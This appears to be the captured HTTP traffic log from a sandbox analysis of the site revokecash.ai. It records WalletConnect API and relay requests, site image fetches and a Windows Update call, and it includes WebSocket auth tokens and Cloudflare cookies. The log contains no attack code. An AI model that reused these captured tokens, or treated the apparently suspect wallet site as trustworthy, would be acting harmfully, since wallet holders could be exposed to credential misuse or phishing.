Source: global trafficHTTP traffic detected: GET /w3m/v1/getAssetImage/692ed6ba-e569-459a-556a-776476829e00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/73f6f52f-7862-49e7-bb85-ba93ab72cc00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/a7f416de-aa03-4c5e-3280-ab49269aef00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/c39b3a16-1a38-4588-f089-cb7aeb584700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/9f259366-0bcd-4817-0af9-f78773e41900?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt0cWZHOEFlMTE1M1k2TnBrTmZUVk1XYUo4YUs3dFRwbTRwMzJydWhUZFExWCIsInN1YiI6ImEwODVmZGFkN2Y4NmE4NDc5ZDgxMWJmNjVkMzZjYjUyZjRkZWJiZGMyNWVhNTYzNWJiNzdmMDUxMzAyZTFlNzMiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0LmNvbSIsImlhdCI6MTcwMjIyNjY2MSwiZXhwIjoxNzAyMzEzMDYxfQ.braqUKGto2csgDrrBUmUDrjyKxyUqfShN472xCip0LsrkyqqKDmffiQTGF2vpJmrB_SJjCB0LPkg1B66aFrcDg&projectId=4de540f0804c83871ac4d89ebb9031e9&ua=wc-2%2Fjs-2.9.0%2Fwindows10-chrome-117.0.0%2Fbrowser%3Arevokecash.ai&useOnCloseEvent=true HTTP/1.1Host: relay.walletconnect.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://revokecash.aiSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: v7gEz1i2d3PcS1n9B6Sg7A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/7e1514ba-932d-415d-1bdb-bccb6c2cbc00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getInjectedListings?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getDesktopListings?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1&page=1&entries=9&version=2 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/204b2240-5ce4-4996-6ec4-f06a22726900?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/a7f416de-aa03-4c5e-3280-ab49269aef00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/b6ee4efc-f53e-475b-927b-a7ded6211700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/c39b3a16-1a38-4588-f089-cb7aeb584700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/fbd441cc-e861-46dc-48ae-a04228ddb500?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/7fd5a23a-3a01-4cfb-3c8b-9f43ae414400?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://revokecash.aisec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/7e1514ba-932d-415d-1bdb-bccb6c2cbc00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/73f6f52f-7862-49e7-bb85-ba93ab72cc00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/9f259366-0bcd-4817-0af9-f78773e41900?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w3m/v1/getAssetImage/692ed6ba-e569-459a-556a-776476829e00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt0cWZHOEFlMTE1M1k2TnBrTmZUVk1XYUo4YUs3dFRwbTRwMzJydWhUZFExWCIsInN1YiI6Ijk2NDdiYWMwNjc4M2ZlYTBlZGI2ZjM3YzJhYjFlNzEwNGFjMjYyNTIxZWMzN2M5YmQyNGYyMzYwNDY4MjY3YjMiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0Lm9yZyIsImlhdCI6MTcwMjIyNjY2MywiZXhwIjoxNzAyMzEzMDYzfQ.yIyvx3Jv0SliresApCafdVYQ7jrORaA3CB9iXEXmDBL1fGm5fGUPkoBRtgv7T3KKwnjUqnAuFgPvf5SCQtFuDQ&projectId=4de540f0804c83871ac4d89ebb9031e9&ua=wc-2%2Fjs-2.9.0%2Fwindows10-chrome-117.0.0%2Fbrowser%3Arevokecash.ai&useOnCloseEvent=true HTTP/1.1Host: relay.walletconnect.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://revokecash.aiSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: bHoFJCbqFmAixEZAJIZcwA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/b6ee4efc-f53e-475b-927b-a7ded6211700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CrXZSKXu8ZgKzyOdQBeSUIBNIgVJ3sD4J7CBXgT0jfM-1702226664-1-Ad0SnxomqRFub2k1lBB/dWlE8xSqpNUxXb8Ef5NV91WLdS9Ug9mTw0zu7yezklS/cvZvVyVpp2lfgcm/kTVUtR8=
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/204b2240-5ce4-4996-6ec4-f06a22726900?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CrXZSKXu8ZgKzyOdQBeSUIBNIgVJ3sD4J7CBXgT0jfM-1702226664-1-Ad0SnxomqRFub2k1lBB/dWlE8xSqpNUxXb8Ef5NV91WLdS9Ug9mTw0zu7yezklS/cvZvVyVpp2lfgcm/kTVUtR8=
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/fbd441cc-e861-46dc-48ae-a04228ddb500?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CrXZSKXu8ZgKzyOdQBeSUIBNIgVJ3sD4J7CBXgT0jfM-1702226664-1-Ad0SnxomqRFub2k1lBB/dWlE8xSqpNUxXb8Ef5NV91WLdS9Ug9mTw0zu7yezklS/cvZvVyVpp2lfgcm/kTVUtR8=
Source: global trafficHTTP traffic detected: GET /w3m/v1/getWalletImage/7fd5a23a-3a01-4cfb-3c8b-9f43ae414400?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1Host: explorer-api.walletconnect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CrXZSKXu8ZgKzyOdQBeSUIBNIgVJ3sD4J7CBXgT0jfM-1702226664-1-Ad0SnxomqRFub2k1lBB/dWlE8xSqpNUxXb8Ef5NV91WLdS9Ug9mTw0zu7yezklS/cvZvVyVpp2lfgcm/kTVUtR8=
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FNTl6mFZVU2Yvoy&MD=3dvdtXe6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /_img/boring-security.png HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/vulcan.jpg HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/premint.jpg HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/layer3.jpg HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/notcommon.svg HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/en.svg HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /init HTTP/1.1Host: revokecash.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://revokecash.ai/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: W/"c-rDu2skaeL3muTsdSOt0zV7fI+kc"
Source: global trafficHTTP traffic detected: GET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt0cWZHOEFlMTE1M1k2TnBrTmZUVk1XYUo4YUs3dFRwbTRwMzJydWhUZFExWCIsInN1YiI6ImVkYjNmNWI5YjU0YjcwOTc3MGI3ZmFhMzVjMWQxNGZhZjg2MGMwZjY1NWQwZDJkMDg1MWE2MTNiZDMzNWVkYmQiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0LmNvbSIsImlhdCI6MTcwMjIyNjY2OSwiZXhwIjoxNzAyMzEzMDY5fQ.f-2JaT4aS5waFXxJLIZtdIHQjpTzrTWyftvRNtMXZmcE73M8B8WIqt9_DRx7Pkh1EEllzj92AS0ex4X8upvGBA&projectId=4de540f0804c83871ac4d89ebb9031e9&ua=wc-2%2Fjs-2.9.0%2Fwindows10-chrome-117.0.0%2Fbrowser%3Arevokecash.ai&useOnCloseEvent=true HTTP/1.1Host: relay.walletconnect.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://revokecash.aiSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=YD94S42W_KZc1cIu43JNqSDqDzEjxJ6AqgPFYIoGAKo-1702226668-0-AcY4kZecMvVNd+2tgdWY5r22mxpAQEy0KOOmd18EKhqfPvIJVvUXHP/xzAbRSEMG58Cp6YfKrfnMAnSxgQkXDLA=Sec-WebSocket-Key: z9qWf75BxX8qOkXN9O4jLA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /_img/notcommon.svg HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/en.svg HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_img/vulcan.jpg HTTP/1.1Host: revokecash.aiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
